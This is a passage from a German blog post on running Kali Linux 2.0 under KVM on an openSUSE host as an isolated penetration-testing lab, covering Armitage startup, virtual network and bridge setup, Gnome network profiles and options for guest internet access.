    Verbindungsaufbau zum XML-RPC-Dämon verzögert sich ggf. etwas, wenn “msfrpcd” und sein Connection Client im Zuge des armitage-Starts erst nachgeladen und selbst gestartet werden. Einer unmittelbaren Meldung über einen abgelehnten Verbindungsaufbau sollte man daher mit etwas Geduld begegnen. Armitage läuft bei mir auch über eine SSH-Shell auf dem Virtualisierungshost.

  • Virtuelle Netze:
    Eine Pen-Test-Übungsumgebung setzt auf dem Host virtuelle Netzwerke mit weiteren virtualisierten Target-Systemen voraus. “virt-manager” unterstützt einem beim Einrichten von virtuellen Netzwerken und deren Bridge-Konfigurationen auf dem Host sehr gut, so dass es hier kaum zu Problemen kommen sollte.
    Der Kali-Gast unter KVM ist danach mit mehreren Interfaces zu unterschiedlichen virtuellen Netzen – und/oder zum (ggf. spezifisch routenden) Host – auszustatten. Ggf. sind sogar virtualisierte Bridges/Switches auf dem Host und deren Verhalten bei Angriffen von einem virtualisierten Gast aus Hauptgegenstand der Untersuchung. In jedem Fall sollte man sich sehr genau überlegen, mit welchen virtualisierten Netzen man den Host ausstattet und wie der Kali-Gast mit diesen Netzen in Kontakt tritt. Für eine Einarbeitung in virtuelle Netze kann man etwa den Literatur-Hinweisen unter
    https://linux-blog.anracom.com/2015/10/19/virtualisierte-netze-mit-kvmqemulibvirt-hinweise-und-links-zur-systematischen-einarbeitung-2/
    folgen.
    Auf dem Kali-Gastsystem selbst bietet das Netzwerk-Symbol rechts auf der obigen Bedienleiste des Gnome-Desktops schnellen Zugang zu Netzwerk-Einstellungen. Alternativ über das “Gnome Control Center”: Unter “Anwendungen” suche man “Einstellungen >> Netzwerk”. Die Möglichkeit, “Profile” für das jeweilige NIC einzurichten, ist absolut nützlich – vor allem wegen des Anlegens von evtl erforderlichen Routen auf dem Gastsystem. Dass auch bei kleineren Änderungen möglicherweise gleich ein komplettes neues Profil angelegt wird, ist etwa gewöhnungsbedürftig. Zudem klappt das Umschalten zwischen validen Profilen in der virtualisierten Umgebung nicht immer ganz problemfrei. Zur Not muss man die Netzwerkverbindung über die angebotenen Schalter stoppen und neu starten. Überflüssige Profile sollte man tunlichst löschen. Einmal laufende Verbindungen für die verschiedenen NICS zu unterschiedlichen virtuellen Netzen und ihren Bridges werden zuverlässig reproduziert.
  • Internet-Zugang:

    Natürlich benötigt das virtuelle Gastsystem für Paketinstallationen Internet-Zugang. Auch hier stellt sich wieder die Frage der Isolation des Systems. Man hat hier mehrere Möglichkeiten in ansteigender Reihenfolge der Isolation:

    direktes Bridging einer virtuellen Gast-Nic auf eine physikalisches Device des Hosts, virtuelle Bridge mit virtuellem Host-Interface und Routing am Host, virtuelle Bridge mit virtuellem Host-Interface und NAT-Konfiguration am Host.

    Die letzte, ggf. aber auch die vorletzte Variante erfordern entsprechende Netfilter-ebtables/iptables-Regeln am Host zur besseren Kontrolle. Was immer man wählt:

    Die entscheidende Punkt ist, ob und dass man das System während Penetrationstests in seiner virtuellen Umgebung vom Kontakt mit der Umwelt abklemmt und dafür die entsprechenden virtuellen Interfaces des Hosts abschaltet – oder ob man bei bestimmten Tests parallel auf das Internet zugreifen muss/will. Letzteres sehe ich für Übungsszenarien im virtuellen Labor eher als Problem. Ich erledige Internet-Recherchen etc. im Zweifel eher über den Host selbst.

Fazit:
Insgesamt bin ich mit dem Einsatz von Kali unter KVM auf einem Opensuse-13.2-Host sehr zufrieden. Die KVM-Umgebung
bietet hinreichend Flexibilität, um jede Art von virtuellem Netz aufzusetzen und bei Bedarf auch ad hoc und zügig zu ändern. Das ist für ein Penetration-Test-Labor optimal. Das Kali 2.0-System ist gut aufgeräumt und bekanntermaßen mit vielen nützlichen Tools ausgestattet, die für die verschiedenen Phasen und Aufgabenbereiche von Pen-Tests vorsortiert sind. Der Debian-Unterbau von Kali 2.0 läuft unter KVM mit Spice und virtio-Treibern wirklich flüssig. Es macht richtig Spaß!

Interessanterweise muss ich als alter KDE-Nutzer sogar zugeben, dass ich dem schnörkelfreien Gnome-Desktop von Kali durchaus etwas abgewinnen kann. Man arbeitet ja meist eh’ auf der Kommando-Zeile …